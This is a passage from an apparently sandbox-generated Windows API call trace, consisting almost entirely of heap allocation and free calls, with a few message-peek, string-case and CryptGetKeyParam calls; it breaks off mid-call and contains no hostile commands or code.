dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0038.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0038.079] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889508 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0038.079] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56c1) returned 0xacadb8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0038.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.080] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0038.080] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0038.080] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0038.081] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0038.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0038.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.081] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0038.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0038.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da3e8 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0038.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c790 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0038.081] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0038.081] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.081] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.082] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0038.082] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.082] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.083] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.083] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0038.083] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0038.084] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0038.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb68 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.084] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.084] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.085] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0038.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.086] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.086] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0038.087] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0038.087] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0038.088] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.088] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.088] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: 